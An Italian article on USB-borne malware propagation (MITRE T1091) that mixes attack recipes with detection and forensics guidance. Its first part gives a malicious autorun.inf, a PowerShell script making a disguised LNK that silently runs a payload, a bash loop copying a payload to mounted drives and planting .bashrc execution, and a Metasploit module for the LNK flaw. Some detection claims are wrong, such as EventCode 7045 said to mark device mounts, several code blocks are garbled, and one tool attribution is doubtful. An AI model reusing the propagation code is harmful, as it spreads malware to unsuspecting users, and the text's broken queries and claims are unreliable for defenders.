Infiltrazione via Chiavetta: Replication Through Removable Media (T1091)

Partiamo dalla base: creare un payload che si propaga automaticamente. Su Windows, il classico autorun.inf è ancora sorprendentemente efficace:

[AutoRun]
open=malware.exe
icon=folder.ico
action=Open folder to view files

Ma i sistemi moderni hanno disabilitato Autorun per i drive USB. APT28 ha risolto brillantemente il problema con una tecnica più sofisticata. Il loro tool crea collegamenti LNK malevoli che sfruttano icone familiari.

Per replicare questo approccio in laboratorio, usa PowerShell per generare un LNK che esegue codice nascosto:

$WshShell = New-Object -ComObject WScript.Shell $Shortcut = $WshShell.CreateShortcut("E:\Documents.lnk") $Shortcut.TargetPath = "powershell.exe" $Shortcut.Arguments = "-WindowStyle Hidden -ExecutionPolicy Bypass -File E:\payload.ps1" $Shortcut.IconLocation = "C:\Windows\System32\imageres.dll,3" $Shortcut.Save()

Il trucco sta nell'icona: usando imageres.dll,3 ottieni l'icona standard delle cartelle di Windows. L'utente crede di aprire una normale directory.

Per sistemi Linux, la propagazione richiede un approccio diverso. Crea uno script che si copia automaticamente quando rileva nuovi mount point:

#!/bin/bash while true; do

• for mount in $(findmnt -rno TARGET | grep -E "^/media|^/mnt"); do*
• cp /tmp/.hidden/payload.sh "$mount/.autostart" 2>/dev/null*
• echo "cd $mount && ./.autostart" >> ~/.bashrc*
• done*
• sleep 60* done

Stuxnet ha portato questa tecnica a un livello superiore sfruttando la vulnerabilità CVE-2010-2568 nei file LNK. Anche solo visualizzare l'icona in Windows Explorer era sufficiente per l'esecuzione del codice. Per testare vulnerabilità simili in ambiente controllato, usa Metasploit:

use exploit/windows/fileformat/ms10_046_shortcut_icon_dllloader

La persistenza cross-platform richiede creatività. Flame utilizzava moduli specifici per infettare diversi tipi di dispositivi. Un approccio moderno potrebbe includere payload multipiattaforma in Python, compilati con PyInstaller per ogni OS target.

La detection di questa tecnica richiede correlazione tra eventi apparentemente innocui. Il punto chiave è identificare l'esecuzione di file poco dopo il montaggio di un dispositivo rimovibile.

Configura questa query Splunk per catturare la sequenza tipica:

index=windows EventCode=7045 OR EventCode=1 OR EventCode=4688 | eval drive_letter=if(EventCode=7045 AND match(ServiceName, "^[E-Z]:"), substr(ServiceName,1,2), null) | transaction startswith=(EventCode=7045) endswith=(EventCode=1 OR EventCode=4688) maxspan=5m | where isnotnull(drive_letter) AND match(NewProcessName, drive_letter)

L'EventCode 7045 indica il montaggio di un nuovo dispositivo, mentre 1 e 4688 tracciano l'esecuzione di processi. La magia sta nel correlare questi eventi entro una finestra temporale di 5 minuti.

Per ridurre i falsi positivi, implementa una whitelist basata su hash per software portabili legittimi. In Sysmon, aggiungi questa regola:

<RuleGroup name="USB_Execution" groupRelation="and">
  <ProcessCreate onmatch="include">
    <Image condition="begin with">E:\</Image>
    <Image condition="begin with">F:\</Image>
  </ProcessCreate>
  <Rule groupRelation="and">
    <Hashes condition="is not">SHA256=trusted_hash_here</Hashes>
  </Rule>
</RuleGroup>

Il behavioral monitoring deve anche considerare la creazione di file su dispositivi rimovibili. Gamaredon Group modifica i file LNK su tutti i drive disponibili. Monitora questa attività con:

Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational';ID=11} | Where {$.Message -match "[E-Z]:\" -and $.Message -match ".lnk"}

Un indicatore sottile ma potente è l'entropia dei file. Malware come PlugX spesso si presenta come eseguibile packed. Calcola l'entropia dei nuovi file sui dispositivi rimovibili e genera alert per valori superiori a 7.5.

L'analisi forense di un'infezione via removable media inizia sempre dal registro di sistema. La chiave HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 contiene la cronologia di tutti i dispositivi USB collegati.

Estrai questi dati con:

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2" /s > usb_history.txt

Ma la vera miniera d'oro è il registro SYSTEM. Cerca le voci di USBSTOR per ricostruire quando specifici dispositivi sono stati collegati:

grep -A 5 -B 5 "USBSTOR" SYSTEM > usb_timeline.txt

Agent.btz, uno dei primi worm USB sofisticati, lasciava tracce distintive. Creava sempre un file autorun.inf e una copia di se stesso con nomi specifici. Per cercare pattern simili:

find /mnt/evidence -name "autorun.inf" -o -name ".tmp" -o -name "thumb.db" | while read f; do file "$f"; strings "$f" | head -20; done*

Gli artefatti di Windows Prefetch sono cruciali per capire l'ordine di esecuzione. Se vedi E:\DOCUMENTS.EXE-[HASH].pf seguito immediatamente da processi di sistema compromise, hai trovato il paziente zero.

La timeline reconstruction deve considerare anche i file di collegamento. Darkhotel modificava gli eseguibili esistenti sui media rimovibili. Confronta gli hash dei file prima e dopo l'infezione:

hashdeep -r /media/usb_backup > before.txt hashdeep -r /mnt/infected_usb > after.txt diff before.txt after.txt

Per sistemi Linux, analizza i log di udev che registrano ogni evento di mount:

journalctl -u systemd-udevd | grep -E "sd[b-z]|Mounted"

L'analisi della memoria volatile può rivelare processi in esecuzione da path sospetti. Usa Volatility per identificare processi lanciati da drive rimovibili.

APT28 rimane il gold standard per questa tecnica. Il loro approccio multi-stadio usa CHOPSTICK per infettare sistemi air-gapped e USBferry per l'esfiltrazione bidirezionale. La caratteristica distintiva è l'uso di moduli separati per infezione e comunicazione.

FIN7 ha evoluto il social engineering fisico. Non si limitano a lasciare chiavette USB nei parcheggi - le spediscono direttamente via posta con lettere di accompagnamento convincenti. Le loro USB si comportano come tastiere virtuali HID, bypassando completamente i controlli sui file eseguibili.

Gamaredon Group mostra un pattern geografico interessante. Concentrati sull'Ucraina, utilizzano questa tecnica principalmente in ambienti governativi dove i sistemi critici sono deliberatamente offline. Il loro indicatore distintivo è la modifica delle chiavi User Assist e la creazione massiva di LNK su ogni drive disponibile.

L'overlap nei tool è significativo. PlugX, utilizzato sia da Mustang Panda che da altri attori cinesi, include sempre un modulo di propagazione USB. La variante personalizzata di Mustang Panda si distingue per l'uso di encryption custom sui payload copiati.

Aoqin Dragon rappresenta l'evoluzione moderna: il loro dropper implementa una strategia worm completa, non limitandosi alla semplice copia ma modificando il sistema target per garantire la propagazione continua. Questo suggerisce una pianificazione per campagne di lungo termine in ambienti specifici.

Il trend emergente mostra uno spostamento verso payload modulari. Invece di un singolo malware monolitico, i gruppi APT più sofisticati deployano componenti specializzati: uno per la propagazione iniziale, uno per la persistenza, uno per la comunicazione C2.

Framework MITRE ATT&CK T1091. Analisi dettagliata delle campagne Agent.btz, Stuxnet e operazioni APT28. Microsoft Defender for Endpoint device control documentation. SANS incident response guides per USB-borne malware.